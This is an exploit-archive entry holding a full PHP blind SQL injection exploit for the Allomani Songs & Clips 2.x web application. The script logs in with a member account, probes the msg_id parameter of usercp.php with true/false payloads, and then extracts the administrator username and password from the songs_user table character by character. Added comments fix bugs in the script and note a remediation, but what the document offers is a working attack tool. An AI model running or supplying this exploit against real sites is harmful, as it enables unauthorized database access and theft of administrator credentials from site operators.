Allomani Songs & Clips 2.x (msg_id) Blind SQL Injection Exploit



EKU-ID: 818 | CVE: (none listed) | OSVDB-ID: (none listed)
Author: ahwak2000 Published: 2011-08-15 Verified: Verified


<?php
/*
===============================================================
Allomani Songs & Clips 2.x (msg_id) Blind SQL Injection Exploit
===============================================================
#[+]Version : 2.x
#[+]Author  : ahwak2000
#[+]home  : tryag.cc/cc/ ~ p0c.cc/vb/
#[+]Date   : 13.08.2011
#[+]E-mail : z.u5[at]hotmail.com
#[+]script home: http://allomani.com
#[+]Tested On: win xp sp3
===============================================================
*/
// Disable PHP's execution-time limit: the blind extraction below issues one
// HTTP request per candidate character per position and can run for minutes.
ini_set("max_execution_time",0);
print_r('
                         ___________________________
________________________| Allomani 2.x eXploit 0d4y |_________________________
   _     _   _   _        _     _     _  _   _____     _____   _____   _____
 / _ \  | | | | | |  __  | |  / _ \  | |//  |  _  |   /  _  \ /  _  \ /  _  \
| |_| | | |_| | | | /  \ | | | |_| | |   \  |_| / /   | | | | | | | | | | | |
| | | | |  _  | | |/ /\ \| | | | | | | |\ \    / /__  | |_| | | |_| | | |_| |
|_| |_| |_| |_| |___/  \___| |_| |_| |_| \_\  |_____| \_____/ \_____/ \_____/
_______________________________________________________________________________
                              z.u5@hotmail.com
');
// Usage check: host, application directory, and the password and numeric id of
// an existing member account. The injectable page (usercp.php, msg_reply) is
// only reachable with a valid session, so a working account is a precondition.
if ($argc<5) {
print_r('
-----------------------------------------------------------------------------

example: php '.$argv[0].' allomain.com /demo/ user_pass user_id

-----------------------------------------------------------------------------
');
die;
}
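 /**
  * Send one authenticated GET to usercp.php with the msg_id parameter
  * extended by $inj and return the raw HTTP response (headers and body).
  *
  * The application authenticates from two cookies: the member id and the
  * unsalted MD5 of the password; the request mirrors that scheme. Note that
  * the hash travels over plain HTTP (port 80 only, no TLS support here).
  *
  * @param string $victim     target host name, no scheme
  * @param string $vic_dir    application path, e.g. "/demo/"
  * @param string $user_pass  clear-text password of a valid member account
  * @param string $user_id    numeric id of that account
  * @param string $inj        text appended to "msg_id=89" (the injection payload)
  * @return string            full response; the script dies on a connect
  *                           failure or a 404 status line
  */
 function AHWAK($victim,$vic_dir,$user_pass,$user_id,$inj){
    $host = $victim;
    $p = "http://".$host.$vic_dir;

    // Absolute-URI request line; msg_id is where the SQL is injected.
    $packet  = "GET ".$p."/usercp.php?action=msg_reply&msg_id=89".$inj." HTTP/1.0\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
    $packet .= "Host: ".$victim."\r\n";
    $packet .= "Cookie: songs_member_data_id=".$user_id."; songs_member_data_password=".md5($user_pass).";\r\n";
    $packet .= "Pragma: no-cache\r\n";
    $packet .= "Connection: Close\r\n\r\n";

    $o = @fsockopen($host, 80);
    if (!$o) {
        echo "\n[x] No response...\n";
        die;
    }

    fputs($o, $packet);
    // $data was never initialised in the original; appending to an undefined
    // variable raises a notice and is reported by E_STRICT/E_ALL setups.
    $data = '';
    while (!feof($o)) {
        $data .= fread($o, 1024);
    }
    fclose($o);

    // Inspect the status line only, and accept both HTTP/1.0 and HTTP/1.1
    // servers (the original only recognised a literal "HTTP/1.1 404 Not Found"
    // anywhere in the response, so an HTTP/1.0 reply slipped through).
    if (preg_match('#^HTTP/1\.[01] 404#', $data)) {
        echo "\n[x] 404 Not Found... Make sure of path. \n";
        die;
    }

    return $data;
 }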
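  /**
   * Extract the contents of the first <textarea ...>...</textarea> in an
   * HTML response. The reply-form textarea is the oracle for the blind
   * injection: its contents differ between a TRUE and a FALSE condition.
   *
   * @param string $from  raw HTTP response (headers and body)
   * @return string|null  inner text of the first textarea, or null when the
   *                      page has none (the original indexed $out[1][0]
   *                      unconditionally and raised an undefined-offset notice
   *                      on a non-matching page; null keeps the loose "=="
   *                      comparisons in the caller behaving as before)
   */
  function AHWAK_GET($from){
      // Parentheses are the PCRE delimiters here; s = dot matches newline,
      // i = case-insensitive, U = ungreedy so the shortest textarea wins.
      preg_match_all("(<textarea .*>(.*)</textarea>)siU", $from, $out);
      return isset($out[1][0]) ? $out[1][0] : null;
  }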

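// Command-line arguments: target host, application directory, and the
// password and numeric id of an existing member account (the injectable
// page requires a logged-in session).
$host1 = $argv[1];
$dir1 = $argv[2];
$userpass = $argv[3];
$userid = $argv[4];

// The usage check above already exited when $argc < 5; this guard is
// redundant but kept so the block stands on its own.
if ($argc > 4) {
    echo "\nPlease wait...\r\n\r\n";

    // Login probe: an authenticated response is expected to contain "profile".
    // stripos() replaces eregi(), which was deprecated in PHP 5.3 and removed in
    // PHP 7; the pattern had no regex metacharacters, so a case-insensitive
    // substring search is equivalent.
    $login = AHWAK($host1, $dir1, $userpass, $userid, "");
    if (stripos($login, "profile") === false) {
        echo "\n\n\t[-] You have entered an invalid username  or password.\n\n\n";
        exit;
    }

    // Boolean oracle: compare the textarea returned for an always-true and an
    // always-false predicate. The payload closes the quoted msg_id value and
    // comments out the rest of the statement with "/*".
    $truths = AHWAK_GET(AHWAK($host1, $dir1, $userpass, $userid, "' and 1='1/*"));
    $falses = AHWAK_GET(AHWAK($host1, $dir1, $userpass, $userid, "' and 1='2/*"));
    if ($truths == $falses) {
        // Identical pages mean the quote did not reach SQL. magic_quotes_gpc is
        // one cause, but a patched or escaped msg_id (or a page without the
        // reply textarea) produces the same result — do not read this as
        // "only magic_quotes stands in the way".
        echo "\n\t sorry: magic_quotes_gpc = On ): \n";
        exit;
    }

    echo "\n\t[+] Getting Admin UserName And PassWord\n\n\t";
    echo "\n\t-----------------------------------\n\n";

    // Character-by-character extraction of "username:password" for the first
    // row of songs_user. Limitations kept from the original:
    //  - only positions 1..16 are read; if the stored password is a 32-char
    //    MD5 the output is truncated, so raise the bound when needed;
    //  - candidate bytes 46..122 only ('.', '/', digits, ':', letters, '_');
    //    a byte outside that range prints nothing and shifts the output;
    //  - no break after a hit, so a noisy oracle can print several
    //    characters for one position.
    for ($g = 1; $g <= 16; $g++) {
        for ($i = 46; $i <= 122; $i++) {
            $qest = AHWAK_GET(AHWAK($host1, $dir1, $userpass, $userid, "'+and+ascii(MiD((sElEct+concat_ws(0x3a,username,password)+frOm+songs_user+liMit 0,1),".$g.",1))='".$i."/*"));
            if ($qest == $truths) {
                echo chr($i);
            }
        }
    }

    // Application-side remediation (not part of this script): msg_id should be
    // cast to an integer or bound as a query parameter rather than concatenated
    // into the SQL string.
    echo "\n\n\t-----------------------------------\n\n\tBy Ahwak2000\n\n";
}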